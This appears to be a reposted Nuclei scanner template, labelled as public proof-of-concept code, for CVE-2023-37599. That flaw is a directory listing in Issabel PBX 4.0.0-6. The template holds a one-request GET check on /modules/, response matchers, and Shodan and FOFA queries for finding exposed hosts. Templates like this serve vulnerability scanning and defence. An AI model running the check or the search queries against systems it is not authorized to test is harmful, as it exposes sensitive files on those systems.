漏洞描述
An issue in issabel-pbx v.4.0.0-6 allows a remote attacker to obtain sensitive information via the modules directory
CVE-2023-37599: Issabel PBX 4.0.0-6 - Directory Listing
PoC代码[已公开]
id: CVE-2023-37599
info:
name: Issabel PBX 4.0.0-6 - Directory Listing
author: ritikchaddha
severity: high
description: |
An issue in issabel-pbx v.4.0.0-6 allows a remote attacker to obtain sensitive information via the modules directory
impact: |
Exploiting this vulnerability could lead to unauthorized access to sensitive directories and files, compromising the confidentiality of the system.
remediation: |
It is recommended to update to a patched version of issabel-pbx or apply necessary configuration changes to prevent directory listing.
reference:
- https://github.com/sahiloj/CVE-2023-37599
- https://nvd.nist.gov/vuln/detail/CVE-2023-37599
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-37599
cwe-id: CWE-668
epss-score: 0.89362
epss-percentile: 0.99519
cpe: cpe:2.3:a:issabel:issabel-pbx:4.0.0-6:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: issabel
product: issabel-pbx
shodan-query: title:"issabel"
fofa-query: title="issabel"
tags: cve,cve2023,issabel,issabel-pbx,directory-listing,vuln
http:
- method: GET
path:
- '{{BaseURL}}/modules/'
matchers:
- type: dsl
dsl:
- 'contains(body, "Index of /modules")'
- 'contains_any(body, "issabel", "asterisk_", "billing_")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100983697ab57649207d9edf863b41fc0ae36c1777552dd7a735969e4c0d84775e3022028c1d41c9df913a4db7af30a2e4c4ed8a1c8a7541f54a55f7f498cf5dd2eb78e:922c64590222798bb761d5b6d8e72950